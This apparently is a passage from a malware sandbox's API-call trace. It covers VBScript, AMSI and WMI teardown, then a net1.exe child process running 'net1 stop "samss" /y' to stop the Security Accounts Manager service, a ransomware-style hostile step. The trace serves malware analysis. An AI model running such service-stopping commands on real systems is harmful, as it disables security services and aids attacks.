0x1 [0261.685] malloc (_Size=0x14) returned 0x4e40320 [0261.685] malloc (_Size=0x2000) returned 0x4e43b88 [0261.685] IUnknown:AddRef (This=0x9e5e20) returned 0x3 [0261.685] GetCurrentThreadId () returned 0x1838 [0261.685] IActiveScriptSite:OnEnterScript (This=0x9e5fc0) returned 0x0 [0261.686] IUnknown:AddRef (This=0x9e5e20) returned 0x4 [0261.687] GetCurrentThreadId () returned 0x1838 [0261.687] IActiveScriptSite:OnEnterScript (This=0x9e5fc0) returned 0x0 [0261.687] free (_Block=0x88eeb8) [0261.687] free (_Block=0x4e43b88) [0261.687] free (_Block=0x4e40320) [0261.687] ISystemDebugEventFire:IsActive (This=0xa26d38) returned 0x1 [0261.687] free (_Block=0x4e41208) [0261.687] free (_Block=0x4e429e8) [0261.687] free (_Block=0x88bfd0) [0261.687] VBScriptEngine5:IUnknown:Release (This=0x9e5fc0) returned 0x3 [0261.687] free (_Block=0x4e428d0) [0261.688] VBScriptEngine5:IActiveScript:SetScriptState (This=0x88b620, ss=0) returned 0x0 [0261.688] GetCurrentThreadId () returned 0x1838 [0261.688] GetCurrentThreadId () returned 0x1838 [0261.688] IUnknown:Release (This=0xa26d38) returned 0x1 [0261.688] IActiveScriptSite:OnStateChange (This=0x9e5fc0, ssScriptState=3) returned 0x0 [0261.688] IActiveScriptSite:OnStateChange (This=0x9e5fc0, ssScriptState=5) returned 0x0 [0261.688] GetUserDefaultLCID () returned 0x409 [0261.688] GetACP () returned 0x4e4 [0261.688] IUnknown:Release (This=0x9e5e20) returned 0x1 [0261.688] free (_Block=0x88b8e0) [0261.688] free (_Block=0x88eee0) [0261.688] free (_Block=0x4e43170) [0261.688] free (_Block=0x4e43198) [0261.688] free (_Block=0x4e431c0) [0261.688] free (_Block=0x4e433f8) [0261.688] free (_Block=0x4e43420) [0261.993] free (_Block=0x88ef98) [0261.993] free (_Block=0x4e43448) [0261.993] free (_Block=0x4e431e8) [0261.993] free (_Block=0x4e43060) [0261.993] free (_Block=0x88ef08) [0261.993] free (_Block=0x88c3d0) [0261.993] ISystemDebugEventFire:EndSession (This=0xa26d38) returned 0x0 [0261.993] IUnknown:Release (This=0xa26d38) returned 0x0 [0261.993] free (_Block=0x88be68) [0261.993] free (_Block=0x88e978) [0261.994] free (_Block=0x88bf70) [0261.994] VBScriptEngine5:IUnknown:Release (This=0x9e5fd4) returned 0x2 [0261.994] IActiveScriptSite:OnStateChange (This=0x9e5fc0, ssScriptState=0) returned 0x0 [0261.994] VBScriptEngine5:IUnknown:Release (This=0x9e5fc0) returned 0x1 [0261.994] IXSLProcessor:get_output (in: This=0x9e5da8, pOutput=0x69f96c | out: pOutput=0x69f96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\r\n", varVal2=0x0)) returned 0x0 [0261.994] malloc (_Size=0xc) returned 0x88bab8 [0261.994] XSLTemplate:IUnknown:Release (This=0x9e5da8) returned 0x0 [0261.994] FreeThreadedDOMDocument:IUnknown:Release (This=0x9e5c28) returned 0x2 [0261.994] XSLTemplate:IUnknown:Release (This=0x9e4e08) returned 0x0 [0261.995] VBScriptEngine5:IActiveScript:Close (This=0x88b620) returned 0x0 [0261.996] free (_Block=0x4e3c200) [0261.996] free (_Block=0x88b8d0) [0261.996] free (_Block=0x88bf40) [0261.996] free (_Block=0x4e42898) [0261.997] free (_Block=0x882ba0) [0261.997] VBScriptEngine5:IUnknown:Release (This=0x88b620) returned 0x1 [0261.997] VBScriptEngine5:IUnknown:Release (This=0x88b624) returned 0x0 [0261.997] GetProcAddress (hModule=0x72da0000, lpProcName="AmsiUninitialize") returned 0x72da3fb0 [0261.997] AmsiUninitialize () returned 0x1 [0261.997] FreeLibrary (hLibModule=0x72da0000) returned 1 [0261.997] free (_Block=0x88b620) [0261.997] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0261.997] free (_Block=0x882b40) [0261.997] free (_Block=0x88ba40) [0261.997] memcpy_s (in: _Destination=0x69fa60, _DestinationSize=0xe, _Source=0xa4a2ac, _SourceSize=0x4 | out: _Destination=0x69fa60) returned 0x0 [0261.997] malloc (_Size=0x18) returned 0x882b40 [0261.997] free (_Block=0x882b40) [0261.997] memcpy_s (in: _Destination=0x69f9d8, _DestinationSize=0xe, _Source=0x69fa60, _SourceSize=0x4 | out: _Destination=0x69f9d8) returned 0x0 [0261.997] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0261.998] malloc (_Size=0x3) returned 0x88b8d0 [0261.998] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x88b8d0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0261.998] __iob_func () returned 0x76952608 [0261.998] fprintf (in: _File=0x76952628, _Format="%s" | out: _File=0x76952628) returned 2 [0262.568] __iob_func () returned 0x76952608 [0262.568] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0262.568] free (_Block=0x88b8d0) [0262.568] malloc (_Size=0x800) returned 0x4e41a00 [0262.569] LoadStringW (in: hInstance=0x0, uID=0xafd2, lpBuffer=0x4e41a00, cchBufferMax=1024 | out: lpBuffer="\r\n") returned 0x2 [0262.569] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0262.569] malloc (_Size=0x3) returned 0x88b8d0 [0262.569] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x88b8d0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0262.569] __iob_func () returned 0x76952608 [0262.569] fprintf (in: _File=0x76952628, _Format="%s" | out: _File=0x76952628) returned 2 [0263.362] __iob_func () returned 0x76952608 [0263.362] fflush (in: _File=0x76952628 | out: _File=0x76952628) returned 0 [0263.362] free (_Block=0x88b8d0) [0263.362] free (_Block=0x4e41a00) [0263.362] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0263.362] free (_Block=0x88bab8) [0263.362] ??1CHString@@QAE@XZ () returned 0x1 [0263.363] FreeThreadedDOMDocument:IUnknown:Release (This=0x9e4c18) returned 0x0 [0263.363] ?Empty@CHString@@QAEXXZ () returned 0x72c565f8 [0263.363] free (_Block=0x88ba28) [0263.363] malloc (_Size=0xc) returned 0x88bab8 [0263.363] free (_Block=0x88b920) [0263.363] malloc (_Size=0xc) returned 0x88bb60 [0263.363] free (_Block=0x880598) [0263.363] free (_Block=0x88bbc0) [0263.363] free (_Block=0x88b968) [0263.363] free (_Block=0x88baa0) [0263.363] free (_Block=0x88bab8) [0263.363] free (_Block=0x88bb60) [0263.363] free (_Block=0x880568) [0263.364] free (_Block=0x882ae0) [0263.364] free (_Block=0x88b5e8) [0263.364] free (_Block=0x88bcf8) [0263.364] free (_Block=0x882688) [0263.364] free (_Block=0x882c00) [0263.364] free (_Block=0x88bb48) [0263.364] free (_Block=0x88b568) [0263.364] free (_Block=0x88ac88) [0263.364] free (_Block=0x882b20) [0263.364] free (_Block=0x88b5d8) [0263.364] free (_Block=0x880520) [0263.364] free (_Block=0x88b5b0) [0263.364] free (_Block=0x88ba88) [0263.364] free (_Block=0x88ac58) [0263.364] free (_Block=0x88c520) [0263.364] free (_Block=0x88aa90) [0263.364] free (_Block=0x88bf10) [0263.364] free (_Block=0x88bee0) [0263.364] free (_Block=0x88aa30) [0263.364] free (_Block=0x88aa48) [0263.364] free (_Block=0x88c4e0) [0263.364] free (_Block=0x88aaa8) [0263.364] free (_Block=0x88c480) [0263.364] free (_Block=0x889680) [0263.364] free (_Block=0x88c1e0) [0263.364] free (_Block=0x88c1b0) [0263.364] free (_Block=0x88ba58) [0263.365] free (_Block=0x88bba8) [0263.365] free (_Block=0x88c440) [0263.365] free (_Block=0x88acb8) [0263.365] free (_Block=0x88c4d0) [0263.365] free (_Block=0x88ac70) [0263.365] free (_Block=0x88c270) [0263.365] free (_Block=0x88c210) [0263.365] free (_Block=0x88ad18) [0263.365] free (_Block=0x88acd0) [0263.365] free (_Block=0x88c490) [0263.365] free (_Block=0x88c400) [0263.365] free (_Block=0x88aca0) [0263.365] free (_Block=0x88ba70) [0263.365] free (_Block=0x88c060) [0263.365] ?Empty@CHString@@QAEXXZ () returned 0x72c565f8 [0263.365] free (_Block=0x88adb8) [0263.365] free (_Block=0x882b00) [0263.365] free (_Block=0x88aa60) [0263.365] free (_Block=0x882588) [0263.365] free (_Block=0x8825d0) [0263.365] free (_Block=0x882618) [0263.365] free (_Block=0x88b9f8) [0263.365] free (_Block=0x8826c8) [0263.366] free (_Block=0x880508) [0263.366] free (_Block=0x882bc0) [0263.366] free (_Block=0x8804f0) [0263.366] free (_Block=0x882be0) [0263.366] free (_Block=0x8804d8) [0263.366] free (_Block=0x882960) [0263.366] free (_Block=0x882808) [0263.366] free (_Block=0x882820) [0263.366] free (_Block=0x8827d0) [0263.366] free (_Block=0x8827e8) [0263.366] free (_Block=0x882840) [0263.366] free (_Block=0x882858) [0263.366] free (_Block=0x8804a0) [0263.366] free (_Block=0x8804b8) [0263.366] free (_Block=0x882760) [0263.366] free (_Block=0x882778) [0263.366] free (_Block=0x882728) [0263.366] free (_Block=0x882740) [0263.366] free (_Block=0x882798) [0263.366] free (_Block=0x8827b0) [0263.366] free (_Block=0x8826f0) [0263.366] free (_Block=0x882708) [0263.366] free (_Block=0x8826a0) [0263.366] free (_Block=0x882660) [0263.366] free (_Block=0x88ad30) [0263.367] WbemObjectTextSrc:IUnknown:Release (This=0xa09cb0) returned 0x0 [0263.367] IUnknown:Release (This=0xa09280) returned 0x0 [0263.367] WbemLocator:IUnknown:Release (This=0x9f2e50) returned 0x2 [0263.367] WbemLocator:IUnknown:Release (This=0xa392a8) returned 0x0 [0263.369] WbemLocator:IUnknown:Release (This=0xa0aeb0) returned 0x0 [0263.369] WbemLocator:IUnknown:Release (This=0x9f2e50) returned 0x1 [0263.369] ?Empty@CHString@@QAEXXZ () returned 0x72c565f8 [0263.369] WbemLocator:IUnknown:Release (This=0x9f2e50) returned 0x0 [0263.369] free (_Block=0x88aad8) [0263.369] free (_Block=0x88ab08) [0263.369] free (_Block=0x882a60) [0263.369] free (_Block=0x88ab68) [0263.369] free (_Block=0x88a958) [0263.370] free (_Block=0x882a80) [0263.370] free (_Block=0x88ab20) [0263.370] free (_Block=0x88ac40) [0263.370] free (_Block=0x8829a0) [0263.370] free (_Block=0x88ab98) [0263.370] free (_Block=0x88abf8) [0263.370] free (_Block=0x8828a0) [0263.370] free (_Block=0x88abb0) [0263.370] free (_Block=0x88a9a0) [0263.370] free (_Block=0x882940) [0263.370] free (_Block=0x88ab50) [0263.370] free (_Block=0x88aaf0) [0263.370] free (_Block=0x8829c0) [0263.370] free (_Block=0x88aa78) [0263.370] free (_Block=0x88a9d0) [0263.370] free (_Block=0x8829e0) [0263.370] free (_Block=0x88ac28) [0263.370] free (_Block=0x88aa18) [0263.370] free (_Block=0x882a00) [0263.370] free (_Block=0x889740) [0263.370] free (_Block=0x88abc8) [0263.370] free (_Block=0x882a40) [0263.370] free (_Block=0x88a9e8) [0263.370] free (_Block=0x88abe0) [0263.371] free (_Block=0x882920) [0263.371] free (_Block=0x88aa00) [0263.371] free (_Block=0x88ac10) [0263.371] free (_Block=0x8828c0) [0263.371] free (_Block=0x88aac0) [0263.371] free (_Block=0x88ab38) [0263.371] free (_Block=0x882b60) [0263.371] free (_Block=0x8896c8) [0263.371] free (_Block=0x889710) [0263.371] free (_Block=0x882c60) [0263.371] free (_Block=0x889698) [0263.371] free (_Block=0x889590) [0263.371] free (_Block=0x8828e0) [0263.371] free (_Block=0x889638) [0263.371] free (_Block=0x889608) [0263.371] free (_Block=0x882c20) [0263.371] free (_Block=0x889620) [0263.371] free (_Block=0x889668) [0263.371] free (_Block=0x882980) [0263.371] free (_Block=0x8895c0) [0263.371] free (_Block=0x8895d8) [0263.371] free (_Block=0x882aa0) [0263.371] free (_Block=0x8895f0) [0263.371] free (_Block=0x8896f8) [0263.372] free (_Block=0x882a20) [0263.372] free (_Block=0x889758) [0263.372] free (_Block=0x8896b0) [0263.372] free (_Block=0x882ac0) [0263.372] free (_Block=0x8895a8) [0263.372] free (_Block=0x8896e0) [0263.372] free (_Block=0x882c40) [0263.372] free (_Block=0x889728) [0263.372] free (_Block=0x889650) [0263.372] free (_Block=0x882900) [0263.372] CoUninitialize () [0263.372] DllCanUnloadNow () returned 0x0 [0263.591] free (_Block=0x4e42a00) [0263.591] free (_Block=0x88c358) [0263.591] free (_Block=0x882b80) [0263.591] free (_Block=0x88bda8) [0263.591] free (_Block=0x4e43858) [0263.592] free (_Block=0x88bd20) [0263.620] exit (_Code=-2147217388) [0263.621] free (_Block=0x882d08) [0263.621] free (_Block=0x880fe8) [0263.621] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0263.621] free (_Block=0x889770) [0263.621] free (_Block=0x8826e0) [0263.621] free (_Block=0x880fc8) [0263.621] free (_Block=0x880fa8) [0263.621] free (_Block=0x880f78) [0263.621] free (_Block=0x880f58) [0263.621] free (_Block=0x88c2c0) [0263.621] free (_Block=0x880f28) [0263.621] free (_Block=0x880ee8) [0263.621] free (_Block=0x880ec8) [0263.621] free (_Block=0x88bb18) [0263.621] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0263.621] free (_Block=0x88ade8) Thread: id = 739 os_tid = 0x1af8 Thread: id = 3284 os_tid = 0x4098 Thread: id = 3407 os_tid = 0x4288 Thread: id = 3408 os_tid = 0x4294 Thread: id = 12898 os_tid = 0xd454 Process: id = "30" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1f9c6000" os_pid = "0x1b60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1758" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 765 os_tid = 0x1b64 [0150.567] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0150.567] __set_app_type (_Type=0x1) [0150.567] __p__fmode () returned 0x76953c14 [0150.567] __p__commode () returned 0x769549ec [0150.567] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0150.567] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0150.567] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.567] GetConsoleOutputCP () returned 0x1b5 [0150.982] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0150.982] SetThreadUILanguage (LangId=0x0) returned 0x2d60409 [0151.274] sprintf_s (in: _DstBuf=0x2bcfc88, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0151.274] setlocale (category=0, locale=".437") returned="English_United States.437" [0151.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0151.276] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0151.276] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0151.276] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bcfa30, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0151.276] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x0, Size=0x5e) returned 0x3114230 [0151.276] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0151.277] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bcfa2c | out: Buffer=0x2bcfa2c*=0x3118380) returned 0x0 [0151.277] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bcfa28 | out: Buffer=0x2bcfa28*=0x3118398) returned 0x0 [0151.277] __iob_func () returned 0x76952608 [0151.277] _fileno (_File=0x76952608) returned 0 [0151.277] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0151.277] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0151.277] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0151.277] _wcsicmp (_String1="config", _String2="stop") returned -16 [0151.277] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0151.277] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0151.277] _wcsicmp (_String1="file", _String2="stop") returned -13 [0151.277] _wcsicmp (_String1="files", _String2="stop") returned -13 [0151.277] _wcsicmp (_String1="group", _String2="stop") returned -12 [0151.277] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0151.277] _wcsicmp (_String1="help", _String2="stop") returned -11 [0151.277] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0151.277] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0151.277] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0151.277] _wcsicmp (_String1="session", _String2="stop") returned -15 [0151.277] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0151.277] _wcsicmp (_String1=0x2a1ffc, _String2="stop") returned -15 [0151.277] _wcsicmp (_String1="share", _String2="stop") returned -12 [0151.277] _wcsicmp (_String1="start", _String2="stop") returned -14 [0151.277] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0151.277] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0151.277] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0151.277] _wcsicmp (_String1="accounts", _String2="samss") returned -18 [0151.277] _wcsicmp (_String1="computer", _String2="samss") returned -16 [0151.277] _wcsicmp (_String1="config", _String2="samss") returned -16 [0151.277] _wcsicmp (_String1="continue", _String2="samss") returned -16 [0151.277] _wcsicmp (_String1="cont", _String2="samss") returned -16 [0151.277] _wcsicmp (_String1="file", _String2="samss") returned -13 [0151.277] _wcsicmp (_String1="files", _String2="samss") returned -13 [0151.278] _wcsicmp (_String1="group", _String2="samss") returned -12 [0151.278] _wcsicmp (_String1="groups", _String2="samss") returned -12 [0151.278] _wcsicmp (_String1="help", _String2="samss") returned -11 [0151.278] _wcsicmp (_String1="helpmsg", _String2="samss") returned -11 [0151.278] _wcsicmp (_String1="localgroup", _String2="samss") returned -7 [0151.278] _wcsicmp (_String1="pause", _String2="samss") returned -3 [0151.278] _wcsicmp (_String1="session", _String2="samss") returned 4 [0151.278] _wcsicmp (_String1="sessions", _String2="samss") returned 4 [0151.278] _wcsicmp (_String1="sess", _String2="samss") returned 4 [0151.278] _wcsicmp (_String1="share", _String2="samss") returned 7 [0151.278] _wcsicmp (_String1="start", _String2="samss") returned 19 [0151.278] _wcsicmp (_String1="stats", _String2="samss") returned 19 [0151.278] _wcsicmp (_String1="statistics", _String2="samss") returned 19 [0151.278] _wcsicmp (_String1="stop", _String2="samss") returned 19 [0151.278] _wcsicmp (_String1="time", _String2="samss") returned 1 [0151.278] _wcsicmp (_String1="user", _String2="samss") returned 2 [0151.278] _wcsicmp (_String1="users", _String2="samss") returned 2 [0151.278] _wcsicmp (_String1="msg", _String2="samss") returned -6 [0151.278] _wcsicmp (_String1="messenger", _String2="samss") returned -6 [0151.278] _wcsicmp (_String1="receiver", _String2="samss") returned -1 [0151.278] _wcsicmp (_String1="rcv", _String2="samss") returned -1 [0151.278] _wcsicmp (_String1="netpopup", _String2="samss") returned -5 [0151.278] _wcsicmp (_String1="redirector", _String2="samss") returned -1 [0151.278] _wcsicmp (_String1="redir", _String2="samss") returned -1 [0151.278] _wcsicmp (_String1="rdr", _String2="samss") returned -1 [0151.278] _wcsicmp (_String1="workstation", _String2="samss") returned 4 [0151.278] _wcsicmp (_String1="work", _String2="samss") returned 4 [0151.278] _wcsicmp (_String1="wksta", _String2="samss") returned 4 [0151.278] _wcsicmp (_String1="prdr", _String2="samss") returned -3 [0151.278] _wcsicmp (_String1="devrdr", _String2="samss") returned -15 [0151.278] _wcsicmp (_String1="lanmanworkstation", _String2="samss") returned -7 [0151.278] _wcsicmp (_String1="server", _String2="samss") returned 4 [0151.278] _wcsicmp (_String1="svr", _String2="samss") returned 21 [0151.278] _wcsicmp (_String1="srv", _String2="samss") returned 17 [0151.278] _wcsicmp (_String1="lanmanserver", _String2="samss") returned -7 [0151.278] _wcsicmp (_String1="alerter", _String2="samss") returned -18 [0151.278] _wcsicmp (_String1="netlogon", _String2="samss") returned -5 [0151.279] _wcsupr (in: _String="samss" | out: _String="SAMSS") returned="SAMSS" [0151.279] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3120670 [0151.282] GetServiceKeyNameW (in: hSCManager=0x3120670, lpDisplayName="SAMSS", lpServiceName=0x2c8c28, lpcchBuffer=0x2bcf99c | out: lpServiceName="", lpcchBuffer=0x2bcf99c) returned 0 [0151.282] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0151.282] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0151.282] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0151.282] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0151.282] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0151.282] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0151.282] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0151.282] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0151.282] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0151.283] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0151.283] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0151.283] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0151.283] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0151.283] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0151.283] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0151.283] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0151.283] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0151.283] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0151.283] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0151.283] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0151.283] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0151.283] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0151.283] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0151.283] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0151.283] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0151.283] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0151.283] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0151.283] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0151.283] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0151.283] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0151.283] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0151.283] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0151.283] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0151.283] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0151.283] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0151.283] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0151.283] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0151.283] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0151.283] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0151.283] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0151.283] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0151.283] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0151.283] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0151.283] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0151.283] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0151.283] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0151.284] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0151.284] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0151.284] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0151.284] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0151.284] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0151.284] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0151.284] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0151.284] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120850 [0151.284] OpenServiceW (hSCManager=0x3120850, lpServiceName="SAMSS", dwDesiredAccess=0x84) returned 0x31207d8 [0151.284] ResolveDelayLoadedAPI () returned 0x73f29e60 [0151.285] ControlService (in: hService=0x31207d8, dwControl=0x4, lpServiceStatus=0x2bcf918 | out: lpServiceStatus=0x2bcf918*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0151.285] LocalAlloc (uFlags=0x40, uBytes=0x28) returned 0x3114468 [0151.286] wcscpy_s (in: _Destination=0x3114484, _SizeInWords=0x6, _Source="SAMSS" | out: _Destination="SAMSS") returned 0x0 [0151.286] CloseServiceHandle (hSCObject=0x3120850) returned 1 [0151.286] CloseServiceHandle (hSCObject=0x31207d8) returned 1 [0151.286] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x2bcf8fc | out: Buffer=0x2bcf8fc*=0x31202d0) returned 0x0 [0151.286] _wcsicmp (_String1="SAMSS", _String2="WORKSTATION") returned -4 [0151.286] _wcsicmp (_String1="SAMSS", _String2="LanmanWorkstation") returned 7 [0151.286] _wcsicmp (_String1="SAMSS", _String2="SERVER") returned -4 [0151.286] _wcsicmp (_String1="SAMSS", _String2="LanmanServer") returned 7 [0151.286] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0151.286] _wcsicmp (_String1="SAMSS", _String2="BROWSER") returned 17 [0151.286] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0151.286] _wcsicmp (_String1="SAMSS", _String2="MESSENGER") returned 6 [0151.286] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0151.286] _wcsicmp (_String1="SAMSS", _String2="NETRUN") returned 5 [0151.286] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0151.286] _wcsicmp (_String1="SAMSS", _String2="SPOOLER") returned -15 [0151.286] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0151.286] _wcsicmp (_String1="SAMSS", _String2="ALERTER") returned 18 [0151.286] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0151.286] _wcsicmp (_String1="SAMSS", _String2="NETLOGON") returned 5 [0151.286] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0151.286] _wcsicmp (_String1="SAMSS", _String2="NETPOPUP") returned 5 [0151.286] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0151.286] _wcsicmp (_String1="SAMSS", _String2="SQLSERVER") returned -16 [0151.287] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0151.287] _wcsicmp (_String1="SAMSS", _String2="REPLICATOR") returned 1 [0151.287] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0151.287] _wcsicmp (_String1="SAMSS", _String2="REMOTEBOOT") returned 1 [0151.287] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0151.287] _wcsicmp (_String1="SAMSS", _String2="TIMESOURCE") returned -1 [0151.287] _wcsicmp (_String1="SAMSS", _String2="AFP") returned 18 [0151.287] _wcsicmp (_String1="SAMSS", _String2="AFP") 